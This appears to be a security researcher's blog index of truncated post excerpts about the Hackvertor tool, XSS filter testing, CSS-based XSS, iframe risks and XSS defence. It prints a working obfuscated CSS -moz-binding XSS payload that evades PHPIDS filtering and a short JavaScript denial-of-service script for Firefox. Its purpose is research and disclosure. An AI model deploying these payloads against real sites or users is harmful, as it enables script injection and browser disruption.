New update
I’ve updated Hackvertor again, which allows HMAC hashing, SHA2 hashing support, new line removal and javascript evaluation within tags. A good example of the new features would be the following input:-
<@sha2><@js2str>str=’hello’;for(i=0;i<10;i++) str += ‘o’<@/js2str><@/sha2>
The above creates the string “hellooooooooooo” in javascript and hashes the result with sha2.
I’ve started work on a formatcode tag which [...]
Hacking the PHPIDS again I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who’d have thought that Firefox would allow all that within the url and CSS properties
I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects [...]
I thought I’d continue the theme of experimenting with XSS and trying different things, I haven’t seen this written about anywhere so here goes. The idea is using CSS as a XSS payload, this can be useful when filters allow some things but make it difficult to construct an attack.
I’ve decided to call it [...]
I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found
First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as [...]
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
history.__defineGetter__("x", function() {
for(i in this) {
try {
alert(this[i]);
} catch(e) {
}
}
});
history.x;
}
Tested on Firefox 2.0.0.9 mac, a window pops up [...]
Welcome my young apprentice so you want to learn how to defend yourself from the onslaught of XSS ninjas do you? Well in my first Dojo lesson I shall show you techniques of the shaolin crane style to defend yourself from the XSS punch.
XSS roundhouse
Use the roundhouse wisely my young master and always proceed with [...]
I’ve been busy…real busy on Hackvertor so I thought it might be a good idea to explain the ideas behind it. Please note Hackvertor is currently only tested under Firefox. I may support other browsers in future.
What is it?
It’s many things: a conversion utility, browser hacking platform, targeted fuzzing tool, XSS filter testing tool [...]
I’ve decided to collect the various proof of concepts I’ve done and summarise why iframes are a security risk. Here are the top reasons:-
1. Browser cross domain exploits
Description:-
Because you can embed another web site inside your page, you can exploit that page and perform actions as that user and doing anything on a chosen web [...]
I believe in releasing code as early as possible and often. So I’ve released another version of JSCK, the code isn’t a complete solution at the moment and is more of a proof of concept rather than a final version you can use on live sites but it highlights the method well and should provide [...]